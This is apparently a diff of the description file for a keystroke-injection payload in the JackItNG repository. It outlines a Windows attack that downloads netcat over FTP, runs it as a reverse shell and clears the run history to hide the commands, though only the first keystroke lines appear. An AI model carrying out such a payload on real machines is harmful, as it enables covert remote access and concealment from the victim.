curiousmaster/JackItNG/payloads/Windows/Payload-netcat-FTP-download-and-reverse-shell.md

-This script will:
+REM This script will:
-* create an FTP script that logs you in to the FTP server and download netcat
+REM * create an FTP script that logs you in to the FTP server and download netcat REM * delete the FTP script file
-* delete the FTP script file
+REM * run netcat in daemon mode
-* run netcat in daemon mode
+REM * run cmd.exe one more time to conceal the command we used in the run history.
-* run cmd.exe one more time to conceal the command we used in the run history.
+REM

-Fill in the required information where you see the brackets.
+REM Fill in the required information where you see the brackets.
 ```c
 DELAY 10000
 GUI r